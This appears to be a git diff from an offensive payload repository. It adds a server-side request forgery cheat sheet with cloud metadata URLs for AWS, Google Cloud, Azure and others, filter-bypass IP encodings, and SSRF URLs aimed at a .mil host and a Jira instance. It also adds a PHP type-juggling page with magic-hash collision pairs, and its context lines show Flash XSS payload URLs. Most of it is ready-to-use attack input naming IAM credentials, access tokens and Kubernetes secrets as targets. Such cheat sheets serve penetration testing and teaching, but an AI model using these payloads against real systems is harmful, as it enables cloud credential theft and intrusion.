https://website.mil/plugins/servlet/oauth/users/icon-uri?consumerUri=http://brutelogic.com.br/poc.svg
|
||||||
|
```
|
||||||
|
|
||||||
|
## SSRF URL for Cloud Instances
|
||||||
|
|
||||||
|
### SSRF URL for AWS Bucket
|
||||||
|
|
||||||
|
[Docs](http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories)
|
||||||
|
Interesting path to look for at `http://169.254.169.254`
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
Always here : /latest/meta-data/{hostname,public-ipv4,...}
|
||||||
|
User data (startup script for auto-scaling) : /latest/user-data
|
||||||
|
Temporary AWS credentials : /latest/meta-data/iam/security-credentials/
|
||||||
|
```
|
||||||
|
|
||||||
|
DNS record
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
http://169.254.169.254
|
||||||
|
http://metadata.nicob.net/
|
||||||
|
http://169.254.169.254.xip.io/
|
||||||
|
http://1ynrnhl.xip.io/
|
||||||
|
http://www.owasp.org.1ynrnhl.xip.io/
|
||||||
|
```
|
||||||
|
|
||||||
|
HTTP redirect
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
Static:http://nicob.net/redir6a
|
||||||
|
Dynamic:http://nicob.net/redir-http-169.254.169.254:80-
|
||||||
|
```
|
||||||
|
|
||||||
|
Alternate IP encoding
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
http://425.510.425.510/ Dotted decimal with overflow
|
||||||
|
http://2852039166/ Dotless decimal
|
||||||
|
http://7147006462/ Dotless decimal with overflow
|
||||||
|
http://0xA9.0xFE.0xA9.0xFE/ Dotted hexadecimal
|
||||||
|
http://0xA9FEA9FE/ Dotless hexadecimal
|
||||||
|
http://0x41414141A9FEA9FE/ Dotless hexadecimal with overflow
|
||||||
|
http://0251.0376.0251.0376/ Dotted octal
|
||||||
|
http://0251.00376.000251.0000376/ Dotted octal with padding
|
||||||
|
```
|
||||||
|
|
||||||
|
More urls to include
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
http://169.254.169.254/latest/user-data
|
||||||
|
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
|
||||||
|
http://169.254.169.254/latest/meta-data/
|
||||||
|
http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]
|
||||||
|
http://169.254.169.254/latest/meta-data/iam/security-credentials/PhotonInstance
|
||||||
|
http://169.254.169.254/latest/meta-data/ami-id
|
||||||
|
http://169.254.169.254/latest/meta-data/reservation-id
|
||||||
|
http://169.254.169.254/latest/meta-data/hostname
|
||||||
|
http://169.254.169.254/latest/meta-data/public-keys/
|
||||||
|
http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key
|
||||||
|
http://169.254.169.254/latest/meta-data/public-keys/[ID]/openssh-key
|
||||||
|
http://169.254.169.254/latest/meta-data/iam/security-credentials/dummy
|
||||||
|
```
|
||||||
|
|
||||||
|
E.g: Jira SSRF leading to AWS info disclosure - `https://help.redacted.com/plugins/servlet/oauth/users/icon-uri?consumerUri=http://169.254.169.254/metadata/v1/maintenance`
|
||||||
|
|
||||||
|
E.g2: Flaws challenge - `http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/latest/meta-data/iam/security-credentials/flaws/`
|
||||||
|
|
||||||
|
### SSRF URL for Google Cloud
|
||||||
|
|
||||||
|
Requires the header "Metadata-Flavor: Google" or "X-Google-Metadata-Request: True"
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
http://169.254.169.254/computeMetadata/v1/
|
||||||
|
http://metadata.google.internal/computeMetadata/v1/
|
||||||
|
http://metadata/computeMetadata/v1/
|
||||||
|
http://metadata.google.internal/computeMetadata/v1/instance/hostname
|
||||||
|
http://metadata.google.internal/computeMetadata/v1/instance/id
|
||||||
|
http://metadata.google.internal/computeMetadata/v1/project/project-id
|
||||||
|
```
|
||||||
|
|
||||||
|
Google allows recursive pulls
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
http://metadata.google.internal/computeMetadata/v1/instance/disks/?recursive=true
|
||||||
|
```
|
||||||
|
|
||||||
|
Beta does NOT require a header atm (thanks Mathias Karlsson @avlidienbrunn)
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
http://metadata.google.internal/computeMetadata/v1beta1/
|
||||||
|
http://metadata.google.internal/computeMetadata/v1beta1/?recursive=true
|
||||||
|
```
|
||||||
|
|
||||||
|
Interesting files to pull out:
|
||||||
|
|
||||||
|
- SSH Public Key : `http://metadata.google.internal/computeMetadata/v1beta1/project/attributes/ssh-keys?alt=json`
|
||||||
|
- Get Access Token : `http://metadata.google.internal/computeMetadata/v1beta1/instance/service-accounts/default/token`
|
||||||
|
- Kubernetes Key : `http://metadata.google.internal/computeMetadata/v1beta1/instance/attributes/kube-env?alt=json`
|
||||||
|
|
||||||
|
### SSRF URL for Digital Ocean
|
||||||
|
|
||||||
|
Documentation available at `https://developers.digitalocean.com/documentation/metadata/`
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
curl http://169.254.169.254/metadata/v1/id
|
||||||
|
http://169.254.169.254/metadata/v1.json
|
||||||
|
http://169.254.169.254/metadata/v1/
|
||||||
|
http://169.254.169.254/metadata/v1/id
|
||||||
|
http://169.254.169.254/metadata/v1/user-data
|
||||||
|
http://169.254.169.254/metadata/v1/hostname
|
||||||
|
http://169.254.169.254/metadata/v1/region
|
||||||
|
http://169.254.169.254/metadata/v1/interfaces/public/0/ipv6/address
|
||||||
|
|
||||||
|
All in one request:
|
||||||
|
curl http://169.254.169.254/metadata/v1.json | jq
|
||||||
|
```
|
||||||
|
|
||||||
|
### SSRF URL for Packetcloud
|
||||||
|
|
||||||
|
Documentation available at `https://metadata.packet.net/userdata`
|
||||||
|
|
||||||
|
### SSRF URL for Azure
|
||||||
|
|
||||||
|
Limited, maybe more exists? `https://azure.microsoft.com/en-us/blog/what-just-happened-to-my-vm-in-vm-metadata-service/`
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
http://169.254.169.254/metadata/v1/maintenance
|
||||||
|
```
|
||||||
|
|
||||||
|
Update Apr 2017, Azure has more support; requires the header "Metadata: true" `https://docs.microsoft.com/en-us/azure/virtual-machines/windows/instance-metadata-service`
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
http://169.254.169.254/metadata/instance?api-version=2017-04-02
|
||||||
|
http://169.254.169.254/metadata/instance/network/interface/0/ipv4/ipAddress/0/publicIpAddress?api-version=2017-04-02&format=text
|
||||||
|
```
|
||||||
|
|
||||||
|
### SSRF URL for OpenStack/RackSpace
|
||||||
|
|
||||||
|
(header required? unknown)
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
http://169.254.169.254/openstack
|
||||||
|
```
|
||||||
|
|
||||||
|
### SSRF URL for HP Helion
|
||||||
|
|
||||||
|
(header required? unknown)
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
http://169.254.169.254/2009-04-04/meta-data/
|
||||||
|
```
|
||||||
|
|
||||||
|
### SSRF URL for Oracle Cloud
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
http://192.0.0.192/latest/
|
||||||
|
http://192.0.0.192/latest/user-data/
|
||||||
|
http://192.0.0.192/latest/meta-data/
|
||||||
|
http://192.0.0.192/latest/attributes/
|
||||||
|
```
|
||||||
|
|
||||||
|
### SSRF URL for Alibaba
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
http://100.100.100.200/latest/meta-data/
|
||||||
|
http://100.100.100.200/latest/meta-data/instance-id
|
||||||
|
http://100.100.100.200/latest/meta-data/image-id
|
||||||
|
```
|
||||||
|
|
||||||
|
### SSRF URL for Kubernetes ETCD
|
||||||
|
|
||||||
|
Can contain API keys and internal ip and ports
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
curl -L http://127.0.0.1:2379/version
|
||||||
|
curl http://127.0.0.1:2379/v2/keys/?recursive=true
|
||||||
|
```
|
||||||
|
|
||||||
|
### SSRF URL for Docker
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
http://127.0.0.1:2375/v1.24/containers/json
|
||||||
|
|
||||||
|
Simple example
|
||||||
|
docker run -ti -v /var/run/docker.sock:/var/run/docker.sock bash
|
||||||
|
bash-4.4# curl --unix-socket /var/run/docker.sock http://foo/containers/json
|
||||||
|
bash-4.4# curl --unix-socket /var/run/docker.sock http://foo/images/json
|
||||||
|
```
|
||||||
|
|
||||||
|
### SSRF URL for Rancher
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
curl http://rancher-metadata/<version>/<path>
|
||||||
|
```
|
||||||
|
|
||||||
|
More info: https://rancher.com/docs/rancher/v1.6/en/rancher-services/metadata-service/
|
||||||
|
|
||||||
|
|
||||||
|
## References
|
||||||
|
|
||||||
|
- [Extracting AWS metadata via SSRF in Google Acquisition - tghawkins - 2017-12-13](https://hawkinsecurity.com/2017/12/13/extracting-aws-metadata-via-ssrf-in-google-acquisition/)
|
||||||
|
- [ESEA Server-Side Request Forgery and Querying AWS Meta Data](http://buer.haus/2016/04/18/esea-server-side-request-forgery-and-querying-aws-meta-data/) by Brett Buerhaus
|
||||||
|
- [SSRF and local file read in video to gif converter](https://hackerone.com/reports/115857)
|
||||||
|
- [SSRF in https://imgur.com/vidgif/url](https://hackerone.com/reports/115748)
|
||||||
|
- [SSRF in proxy.duckduckgo.com](https://hackerone.com/reports/358119)
|
||||||
|
- [Blind SSRF on errors.hackerone.net](https://hackerone.com/reports/374737)
|
||||||
|
- [SSRF on *shopifycloud.com](https://hackerone.com/reports/382612)
|
||||||
|
- [Hackerone - How To: Server-Side Request Forgery (SSRF)](https://www.hackerone.com/blog-How-To-Server-Side-Request-Forgery-SSRF)
|
||||||
|
- [Awesome URL abuse for SSRF by @orange_8361 #BHUSA](https://twitter.com/albinowax/status/890725759861403648)
|
||||||
|
- [How I Chained 4 vulnerabilities on GitHub Enterprise, From SSRF Execution Chain to RCE! Orange Tsai](http://blog.orange.tw/2017/07/how-i-chained-4-vulnerabilities-on.html)
|
||||||
|
- [#HITBGSEC 2017 SG Conf D1 - A New Era Of SSRF - Exploiting Url Parsers - Orange Tsai](https://www.youtube.com/watch?v=D1S-G8rJrEk)
|
||||||
|
- [SSRF Tips - xl7dev](http://blog.safebuff.com/2016/07/03/SSRF-Tips/)
|
||||||
|
- [SSRF in https://imgur.com/vidgif/url](https://hackerone.com/reports/115748)
|
||||||
|
- [Les Server Side Request Forgery : Comment contourner un pare-feu - @Geluchat](https://www.dailysecurity.fr/server-side-request-forgery/)
|
||||||
|
- [AppSecEU15 Server side browsing considered harmful - @Agarri](http://www.agarri.fr/docs/AppSecEU15-Server_side_browsing_considered_harmful.pdf)
|
||||||
|
- [Enclosed alphanumerics - @EdOverflow](https://twitter.com/EdOverflow)
|
||||||
|
- [Hacking the Hackers: Leveraging an SSRF in HackerTarget - @sxcurity](http://www.sxcurity.pro/2017/12/17/hackertarget/)
|
||||||
|
- [PHP SSRF @secjuice](https://medium.com/secjuice/php-ssrf-techniques-9d422cb28d51)
|
||||||
|
- [How I convert SSRF to xss in a ssrf vulnerable Jira](https://medium.com/@D0rkerDevil/how-i-convert-ssrf-to-xss-in-a-ssrf-vulnerable-jira-e9f37ad5b158)
|
||||||
|
- [Piercing the Veil: Server Side Request Forgery to NIPRNet access](https://medium.com/bugbountywriteup/piercing-the-veil-server-side-request-forgery-to-niprnet-access-c358fd5e249a)
|
||||||
|
- [Hacker101 SSRF](https://www.youtube.com/watch?v=66ni2BTIjS8)
|
||||||
|
- [SSRF脆弱性を利用したGCE/GKEインスタンスへの攻撃例](https://blog.ssrf.in/post/example-of-attack-on-gce-and-gke-instance-using-ssrf-vulnerability/)
|
||||||
|
- [SSRF - Server Side Request Forgery (Types and ways to exploit it) Part-1 - SaN ThosH - 10 Jan 2019](https://medium.com/@madrobot/ssrf-server-side-request-forgery-types-and-ways-to-exploit-it-part-1-29d034c27978)
|
62
Type juggling/README.md
Normal file
62
Type juggling/README.md
Normal file
@ -0,0 +1,62 @@
|
|||||||
|
# PHP Juggling type and magic hashes
|
||||||
|
|
||||||
|
PHP provides two ways to compare two variables:
|
||||||
|
|
||||||
|
- Loose comparison using `== or !=` : both variables have "the same value".
|
||||||
|
- Strict comparison using `=== or !==` : both variables have "the same type and the same value".
|
||||||
|
|
||||||
|
## Type Juggling
|
||||||
|
|
||||||
|
### True statements
|
||||||
|
|
||||||
|
```php
|
||||||
|
var_dump('0010e2' == '1e3'); # true
|
||||||
|
var_dump('0xABCdef' == ' 0xABCdef'); # true PHP 5.0 / false PHP 7.0
|
||||||
|
var_dump('0xABCdef' == ' 0xABCdef'); # true PHP 5.0 / false PHP 7.0
|
||||||
|
var_dump('0x01' == 1) # true PHP 5.0 / false PHP 7.0
|
||||||
|
var_dump('0x1234Ab' == '1193131');
|
||||||
|
```
|
||||||
|
|
||||||
|
```php
|
||||||
|
'123' == 123
|
||||||
|
'123a' == 123
|
||||||
|
'abc' == 0
|
||||||
|
```
|
||||||
|
|
||||||
|
```php
|
||||||
|
'' == 0 == false == NULL
|
||||||
|
'' == 0 # true
|
||||||
|
0 == false # true
|
||||||
|
false == NULL # true
|
||||||
|
NULL == '' # true
|
||||||
|
```
|
||||||
|
|
||||||
|
### NULL statements
|
||||||
|
|
||||||
|
```php
|
||||||
|
var_dump(sha1([])); # NULL
|
||||||
|
var_dump(md5([])); # NULL
|
||||||
|
```
|
||||||
|
|
||||||
|
## Magic Hashes - Exploit
|
||||||
|
|
||||||
|
If the hash computed starts with "0e" (or "0..0e") only followed by numbers, PHP will treat the hash as a float.
|
||||||
|
|
||||||
|
| Hash | “Magic” Number / String | Magic Hash | Found By |
|
||||||
|
| ---- | -------------------------- |:---------------------------------------------:| -------------:|
|
||||||
|
| MD5 | 240610708 | 0e462097431906509019562988736854 | Michal Spacek |
|
||||||
|
| SHA1 | 10932435112 | 0e07766915004133176347055865026311692244 | Independently found by Michael A. Cleverly & Michele Spagnuolo & Rogdham |
|
||||||
|
|
||||||
|
```php
|
||||||
|
<?php
|
||||||
|
var_dump(md5('240610708') == md5('QNKCDZO')); # bool(true)
|
||||||
|
var_dump(md5('aabg7XSs') == md5('aabC9RqS'));
|
||||||
|
var_dump(sha1('aaroZmOk') == sha1('aaK1STfY'));
|
||||||
|
var_dump(sha1('aaO8zKZF') == sha1('aa3OFF9m'));
|
||||||
|
?>
|
||||||
|
```
|
||||||
|
|
||||||
|
## References
|
||||||
|
|
||||||
|
* [Writing Exploits For Exotic Bug Classes: PHP Type Juggling By Tyler Borland](http://turbochaos.blogspot.com/2013/08/exploiting-exotic-bugs-php-type-juggling.html)
|
||||||
|
* [Magic Hashes - WhieHatSec](https://www.whitehatsec.com/blog/magic-hashes/)
|
@ -59,6 +59,10 @@ IE8: http://0me.me/demo/xss/xssproject.swf?js=try{alert(document.domain)}catch(e
|
|||||||
IE9: http://0me.me/demo/xss/xssproject.swf?js=w=window.open(‘invalidfileinvalidfileinvalidfile’,’target’);setTimeout(‘alert(w.document.location);w.close();’,1);
|
IE9: http://0me.me/demo/xss/xssproject.swf?js=w=window.open(‘invalidfileinvalidfileinvalidfile’,’target’);setTimeout(‘alert(w.document.location);w.close();’,1);
|
||||||
```
|
```
|
||||||
|
|
||||||
|
### .htaccess
|
||||||
|
|
||||||
|
An .htaccess file is a way to configure the details of your website without needed to alter the server config files.
|
||||||
|
|
||||||
## References
|
## References
|
||||||
|
|
||||||
* Bulletproof Jpegs Generator - Damien "virtualabs" Cauquil
|
* Bulletproof Jpegs Generator - Damien "virtualabs" Cauquil
|
||||||
|
Loading…
Reference in New Issue
Block a user